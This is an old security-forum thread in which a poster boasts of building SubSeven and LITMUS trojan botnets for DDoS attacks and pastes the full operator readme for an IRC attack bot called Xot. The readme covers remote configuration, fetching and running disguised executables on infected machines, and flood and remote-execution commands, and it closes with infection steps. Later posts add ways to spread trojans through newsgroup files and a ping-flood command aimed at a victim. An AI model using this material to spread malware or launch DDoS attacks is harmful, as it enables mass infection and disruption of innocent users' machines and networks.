DDoS - Subseven GT LITMUS and more

View Poll Results: What do you do

Voters
8. You may not vote on this poll
  • Do you have a firewall up?

    1 12.50%
  • Do you use virus protection programs?

    0 0%
  • Do you read the news?

    0 0%
  • All of the above

    7 87.50%
Page 1 of 2 12 LastLast
Results 1 to 10 of 13

Thread: DDoS - Subseven GT LITMUS and more

  1. #1
    acidphreak
    Guest

    Post DDoS - Subseven GT LITMUS and more

    One day i was on ICQ and one of my friends sent me a file. Being young and ignorant I accepted the file and proceeded to open it to notice a funny little error message stateing "BOO!". Turns out I opened a backdoor RAT server file my friend made up to have some fun. Later after learning about RAT and other things of the such i enjoyed toying with them. After a long *matter of years* i got into DDoS. I met a person by the handle Zendral, at the time had a pack of friends known as DrugScare. We quickly became friends and he showed me his botnet of subsevens. At the time ive never seen a good botnet but there was over 130 bots there and i was amazed at what they could do to bascily anything he attacked. Later they showed me how they were infecting so many bots.. Via newsgroups. I found this to work very well by gettin a good amount of bots myself (200). After a while of messing and playing with dif. crap i learned that the server file size was basicly the only thing keepin me from getting alot of bots. When i discovered a trojan named LITMUS who a man named DrGreen gave me to further my botnet, I discovered i could infect over 1500 bots in a 2 hours of postin and a night for the victems to be infected. This of course anyone can iamagine is alot of fire power. I later grew tired of being able to drop any connection to come my way and decided it was time to give it up, so i notifyed the friendly IRCOP on the network i was keepin the bots and requested him to kill my botnet. He was of course more then happy to do so knowing that i had so many bots but not knowin where i kept them and begging me dialy to rid his server of them. I have in my time tryed MANY of DDoS windows trojans, such as GLOBAL THREAT, SUBSEVEN, LITMUS, and many many others... But NONE will ever compare to the one i last used.. It is called XOT, a VERY powerfull DDoS program..

    I am going to paste the read me file for XOT and the very end of this so that you can all see the power in this little baby...

    Why? because it amazes me how much a little 50k file can pack into it...

    DDoS is something i doubt we will ever rid of and it is security related so please no flames, we have enough of them on AO and we dont need more..

    If you do not like my thread then just leave without makein a message... if you do like it give me AO points and reply with your own comments ;x


    with no further delay i give you XOT

    Xot v0.5 Beta 2 By: XenoZ

    Well here it is, my first open beta version of my irc bot Xot. This bot has a ton of goodies for you script kiddies to play with. But let me warn you Xot is not a friendly channel bot. Xot is an attack bot and can possibly cause alot of damage if one choosed to do so. So basically im not to blame if you successfully take down yahoo.com somehow.
    Xot has a main feature which i call DRSS (Dynamic Remote Settings Stub). DRSS is basically important bot settings that are appending at the end of any file you wish to append it to like a .JPG file or a .GIF file. This file that has the settings is then uploaded to a webspace you specify on EditServer and when the server.exe file gets executed on the victem's computer, Xot downloads the settings file periodically at a set interval (interval also specified in EditServer) and Xot syncs the settings in. The major benefits of this feature is that you can change the Irc Server or Channel which your bots idle on _Very_ easyly. The DRSS file is configured in the format of ircd.conf (if you're not familiar with ircd.conf it uses different letter lines like O:lines) when you enter the DRSS file maker program once you type the letter of line you want it will show the parameters to that line.

    Configuration Lines:

    O-lines:
    O-lines are the lines that add the userinfo on users that use your bot. You can have multiple Olines and all parameters for the O-line except for password are allowed to use wildcards.

    Format: O:<host>:<ident>:<nick>:<password>
    Example: O:*.home.com:S*X:Xen*:mindrapist

    I-lines:
    I-lines are the lines that add the botinfo for the irc server that the bot uses, nickname username realname...

    Format: I:<prefix>:<nick>:<ident>:<realname>:<email>:<username>
    Example: I:@:XenBot:Xenny:W3 0wn j00:any@fake.email:Xot

    S-lines:
    S-lines specify the server, server port and password that the bots will idle on. If there is no password leave the 3nd parameter blank but keep the colon.. (for parsing reasons)

    Format: S:<server>:<port>:<password>
    Example: S:irc.lcirc.net:6667:

    C-lines:
    C-lines specify the channel and channel key the bot uses when it connects to the IRC server. if there is no key leave the 2nd parameter blank but keep the colon.. (for parsing reasons)

    Format: C:<channel>:<key>
    Example: C:#mindraperUgScArE

    E-lines:
    Heres a nifty little feature that Overlord_45 gave me the idea for. Why not add Client to bot encryption to keep those bot stealers and spyers away? This line gives the bot encryption of for communication. the E-line specifys the Encryption key and the name of the dll file on your webspace which has the Encryption routines. (I included a DLL and mIRC script in the project for this feature). Thanks to Overlord_45 for this idea. thanks to say-tan and Quension and the rest of the RCforge crew for the encryption resources and thanks to Sarin for the script modifications.

    The first parameter is your encryption key and the second parameter is the name of the dll (submitted in this package) that is in the _SAME_ directory as your DRSS file.

    Format: E:<encryption key>:<DLL name>
    Example: E:MyPersonalKey:Xot.dll

    N-lines:
    N-lines give you the chance to submit a nicklist on you're webspace for the bot to download and use to randomly pick Nickname and Ident. the file data must have nicknames separated with a comma.. No Line Breaks! ... also there is no need to add numbers at the end of nick names in the nick list because when the bot randomly chooses a nickname it tacks on a random 2 digit number at the end. The First and only parameter is the name of the nicklist on the _SAME_ webspace directory as your DRSS file. (a sample nicklist has been given in the package)

    Format: N:<name list source NOT A URL>
    Example: N:nicklist.txt

    U-lines:
    U-lines give you the chance to upload and run an program unto your bots. This feature is good Updating your bots or just adding a new trojan onto the computer. The first parameter is the URL of the file (you can give it any name any extension) the second parameter is what you want the file to be renamed to on download. (some webspace providers dont accept EXE files so this feature is for that reason.. give the exe file a JPG extension and the second parameter changes it back on download) and the third parameter is 1 or 0, 1 being run on download and 0 begin no run on download...
    WARNING: make sure the file doesn't melt on execution other wise the bot will keep downloading it

    Format: U:<url without http>:<filename on computer>:<1 or 0>
    Example: U:my.server.here/server.jpg:server.exe:1

    D-lines:
    D-lines takes startup info out and shutsdown the bot.


    PASSWORD is password on Server.exe for EditServer.exe


    IRC Bot commands: (i'm using "!" as an example prefix)

    !say <channel/user> <text to say> - makes the bot say something
    !op <channel> <user> - makes the bot op someone
    !deop <channel> <user> - makes the bot deop someone
    !ban <channel> <hostmask> - makes the bot ban someone
    !unban <channel> <hostmask> - makes the bot unban someone
    !voice <channel> <user > - makes the bot voice someone
    !devoice <channel> <user> - makes the bot devoice someone
    !notice <channel/user> <text to say> - makes the bot send a notice
    !action <channel/user> <text to say> - makes the bot do an action
    !ctcp <channel/user> <ctcp command> - makes the bot ctcp someone
    !nick <nickname> - makes the bot change its nickname
    !raw <raw IRC command> - makes the bot do a RAW irc command
    !id - makes the bot display its tag
    !sync - makes the bot resync its DRSS file
    !login <password> - logs into the bot
    !exec <hide or show> <commandline> - executes a commandline
    !ping <address> <packetsize> <times> - ICMP attack
    !udp <ip> <packet size> <times> - UDP attack
    !igmp <address> <packetsize> <times> <interval> - IGMP attack
    !clone <server> <port> <# of clones> - clone attack
    !cloneraw <raw IRC command> - send a raw IRC command to the clones
    !clonekill - kills all clones
    !info - gives computer info of the computer that the bot is on
    !botinfo - gives bot version and such

    Encryption -

    This package comes with an mIRC script and a DLL for the encryption routines.. if you want your bot to communicate encrypted add your E:line with the first parameter as the key and the second parameter as the name of the dll file... Xot.dll ... then upload the dll file and upload the new DRSS settings. then in your mIRC client put Xot.ini and Xot.dll in your mIRC folder and do this in mIRC status... :
    /load -rs Xot.ini
    then get on your channel and right click the channel window and there should be a Xot submenu.. same thing with querys.

    NOTE: XOT.INI ONLY WORKS WITH mIRC 5.9+

    Editserver.exe -

    this is where we configure the SERVER.exe file to reconize the webspace of which the DRSS file is in.

    File Location - the exact website url for your DRSS file

    Interval in Min - the interval between DRSS updates

    Password - password to read EditServer settings

    ID tag - add your own little tag to know whos bots they are. or whatever you want in there.

    No Read - this just means if on read should the EditServer read the already appended info or just append more info. (advanced) dont use it unless you know what your doing.


    DRSS Config -

    this is where you make your DRSS file.. you can append it to anything.. but i would use a GIF file because they are small... or you can use a blank txt file... it doesn't matter

    the buttons in DRSS config are self explanatory.. in the memobox all you have to do is type out the letter of line you want and the parameter will automatically appear


    Steps On Infection...

    1. configure your Server.exe via Editserver.exe

    2. Make your DRSS file and Upload it to your specified webspace in Editserver

    3. Start infecting


    Other ****-

    Xot Team:

    Programmer: XenoZ
    Head Beta Tester/ideas for Development : Overlord_45
    mIRC Script Creater/ideas/beta tester : Sarin

    I just wanna give shoutouts to everyone at LCIRC (irc.lcirc.net), NetbioM, Overlord_45 , Sarin, DataSpy (good luck on your bot), Ritual33, ZenDraL and the rest of the Drugscare Crew (who infected like more than half of the cable IP range =P ) , RaYmAn (thanks for teachin me the raw UDP.. but i used TNMUDP =P ) , SilenceGold, Ganja51, narf, CyberFly, evilgoat and slim (good luck on your bots),Gwen and anyone else i missed.


    P.S. This Version Is Dedicated To Rob And Is Released On His Birthday.. Happy Birthday Rob. -XenoZ and NetbioM


    Well thats it for the Beta 2 release...
    Expect more goodies in Beta 3 =D

    -XenoZ






    Thanx for readin this post... If you would like to hear mroe about DDoS drop me a line acidburnds@hotmail.com


    Oh in closing , I made this post to prove that just about anyone can do a good amount of damage over the net with just a little bit of knowlege and a whole lot of spare time ^_^


    WKD *The person who DDoSed www.grc.com* IS THE LAMEST **** ALIVE!!!!! common he hex edited evil bot to make it look like he made the trojan to he used to DDoS GRC.com and his irc network with his "wkd bots" has the /oper of /oper wicked realhack that right, the l33t hackers password was "realhack"! -NetBioM

  2. #2
    Senior Member
    Join Date
    Sep 2001
    Posts
    310
    Hey good post acidphreak, very informative! but i don't think many members of AO will like this post much. Or maybe i'm wrong? Great of you to share your knowledge, but i'm sure your still not into that script kiddie behavior anymore, are you?
    script language=\"M$cript\";
    function beginError(bsod) {
    return true; }
    onLoad.windows = beginError;

  3. #3
    Senior Member
    Join Date
    Nov 2001
    Posts
    472
    What I would like to know is: Are there any cure to these DDos attacks? I've heard that firewall vedors say they've taken care of the problem but I've noticed Remote_Access_ said something about they haven't.

    Anybody know about this? And R_A_, if you read this, can you give me your source?
    ---
    proactive

  4. #4
    Senior Member
    Join Date
    Sep 2001
    Posts
    310
    I don't think it is possible to have a 'cure' for DDoS attacks. Unless you take out the people who conduct the attacks. I've heard about sys admins trying to filter the packets that come through, but the attacker can always change the type they are sending.
    It would be good if there was a cure for it, but I'm afraid it's not that simple.
    script language=\"M$cript\";
    function beginError(bsod) {
    return true; }
    onLoad.windows = beginError;

  5. #5
    acidphreak
    Guest
    Thanks for reading the post ^_^


    No i have not done DDoS in many months which if u ever did do DDoS you know how addicitive it can be, Its more addicitive then Diablo 2 LOD which i stoped playing over a month ago due to havein my 1.08 Valor get stolen by some lame script kiddie ;x the armor sold for more then 350 $'s on ebay many times ;x

    But its cool

    Subseven is a lame DDoS bot trust me on that, but it can be usefull for getting RAS to get more DDoS bots, Or prot-redirect to newsgroups to post more without getting ur ISP notifyed. Its MPING function kills more of ur bots then it does the targets, If you want a good ping packet make ur own, such as !run ping.exe -n 40 -l 30000 -w 30 VICTEMS-IP. It works much better and kills alot less cable bots.

    Keep the postin going splat <- thier so damn cute ^_^

  6. #6
    Senior Member
    Join Date
    Sep 2001
    Posts
    310
    Hey acidphreak since you have sufficent experience in DDoS attacks, how do you think they could be prevented? Any 'tips'?
    thanks
    script language=\"M$cript\";
    function beginError(bsod) {
    return true; }
    onLoad.windows = beginError;

  7. #7
    acidphreak
    Guest
    Oh i forgot!

    as a reply to the cure for DDoS. Ive found that ive NEVER had a user on IRC network survive my big attacks unless they were on a very nice shell v-host. I was able to drop a good ammount of eggys easy but there were always exceptions. Ive found that i could keep even dial up connections down for many hours even if they reconnect. This is what WKD used on www.grc.com which of course i was totally against. WKD is a lame script kiddie who i have attacked many times, i even found it fun to drop the network he had his EVILBOTS on. oh! and so u know, WKD never had a mass ammount of bots, he had less then 200 bots , the reason it looked like so many is because when evil bot is opened more then 1 time for every exstra time it is run it makes a clone of itself. Meaning u could have more then 17 bots running off the same DIAL UP connection. That evilbot was one of the worsee DDoS bots i have ever seen. The 13 year old packet monkey will grow up one day and hopefully get a job and see the REAL world, Cause he sure as hell is going some place fast, but its not any place were non-homosexual men want to be ^_^. A word of advice to WKD, Stay the **** away from me or i will get back to DDoS just to kick ur little 13 year old ass in ur own game.

    -NetBioM


    PLEASE VOTE ON THE POLL! only 1 day left

    irc.icq.com #clubhit nick: NetBioM (to meet me)

  8. #8
    acidphreak
    Guest
    to prevent DDoS my best suggestion is not download ANYTHING no matter who the person is or the site its from that ends in *.com *.exe *.src

    They are the most common used, i personaly liked to send it out as src on porn newsgroups and call it like Sexxxymovie.src *yes i am the same acidphreak that was reported to have 600 subseven bots 2 christmas ago known as the "CHRISTMAS DDoS". You can read about that on X-forces website. Oh yeah and also i liked to hit kiddie porn fawkers. 11yearoldsister.src ;x Not many people know src files run the same as EXE on most of windows OS's. I have not checked XP but i know it works on all other besides NT 4.0 which i mainly run other then XP.

    Keep the postin comein, But i have class again but ill be back to check in around 1 hour.

  9. #9
    PHP/PostgreSQL guy
    Join Date
    Dec 2001
    Posts
    1,164

    Thumbs up very good

    Dude, this is a pretty good post...I was always wondering how DDoS' ran on bots and such (being a sysadm, my worry extends with 1800+ users screwing up the 40+ servers I administer) so this is very educational....you think there's anything that can be written to add in as a "plugin" into the servers, kind of like Return To Castle Wolfenstein's hacked-cd detector/bad name monitoring/team-kill monitoring? See, having someone like yourself who knows how to really break something, you could think of a way to fix it...and if you can't because you're not into programming that much, just let me know and I'll do it

    Very good post once again...this shows the vulnerabilities of machines against DDoS.
    We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.

  10. #10
    acidphreak
    Guest

    Post

    Thanks, i was hopein some would enjoy it without flames. I do not program because i mainly dont have the time or patience for it anymore. There are probly mainy people out there who are able to do such a thing but most likely the software they make will bee something that will cost u a good deal of money, Which i do not blame them for doin cause we all need the money we can get. My friend XenoZ writes most the software i use now dealing with trojans and what not. Out lastest thing was dealing with Diablo 2 LoD but we wont get into that cause that game got lame after everyone had dupes. I mainly work at my school *senior in high school* fixing computers and workin on the website. I will tell you bascily how to detect DDoS and other such things and even how to find out who is running the DDoS on you but it does take alot of time after the attack to figure out whos running the attack on you, even to steal the bots that were run on you. my email is ACIDBURNDS@HOTMAIL.COM drop me a line and maybe we may have a convo on irc.icq.com (#clubhit) (nick: NetBioM).

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •